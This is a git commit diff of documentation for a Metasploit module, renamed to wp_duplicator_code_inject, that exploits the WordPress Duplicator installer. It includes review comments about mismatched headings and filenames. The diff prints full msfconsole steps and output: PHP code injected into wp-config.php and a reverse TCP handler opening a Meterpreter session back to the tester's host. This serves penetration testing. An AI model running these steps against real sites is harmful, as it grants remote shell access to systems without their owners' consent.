renamed module and doc

Shelby Pace
2018-12-11 11:59:19 -06:00
parent 7e953e34b9
commit b82e3469a2
2 changed files with 25 additions and 21 deletions
@@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/wordpress_duplicator`
2. `use exploit/multi/php/wp_duplicator_code_inject`
3. Set the `RHOST`.
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
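Review bot: Steps 4 and 5 of the verification list both read as "Confirm (that) the target is vulnerable", although step 4 is the `check` command and step 5 is its expected output. Since step 2 is being touched anyway, reword step 5 to something like "Verify that `check` reports `The target is vulnerable.`". The setup sentence in the hunk header also names `install.php`, while the options section further down refers to `installer.php`; the two should agree on one filename.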
@@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
```
msf5 > use exploit/multi/php/wordpress_duplicator
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run
msf5 > use exploit/multi/php/wp_duplicator_code_inject
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
rhosts => 192.168.37.247
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
targeturi => /wordpress/installer.php
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1
[*] Sending stage (38247 bytes) to 192.168.37.247
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
[*] Attempting to recreate wp-config file...
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
[*] Successfully created the wp-config.php file!
meterpreter > sysinfo
Computer : debian
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
meterpreter > sysinfo
Computer : WIN-0FAJA14JLP4
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```
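Review bot: The scenario heading still reads "Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40", but the transcript for 192.168.37.247 ends in a `sysinfo` reporting Windows 7 Enterprise SP1 and `Meterpreter : php/windows`. Either rename the heading to match the Windows target, or keep the Debian run under its own heading and add the Windows run as a second scenario, so that readers reproducing the test know which platform and versions the output came from. The new `targeturi` is `/wordpress/installer.php`, which differs from the default path described in the options section just above, so a short sentence before the transcript explaining why it is set would help.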